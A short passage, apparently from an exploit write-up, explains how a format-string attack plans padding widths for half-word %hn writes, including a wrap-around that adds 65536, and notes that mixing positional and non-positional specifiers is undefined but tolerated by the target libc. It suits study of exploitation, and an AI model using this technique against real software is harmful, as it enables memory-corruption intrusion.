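The wrap-around branch matters in practice: when a half equals the count already printed (the high half of a small address like 0x0000bcf8, for instance) the naive width is zero, and a `%0d` still prints at least one character, so the plan adds a full 65536 to come back around. The simulator only models the count; it does not know that the exploit mixes a positional `%112$hn` with a non-positional `%d`, which C leaves undefined and which works here only because the target libc tolerates it.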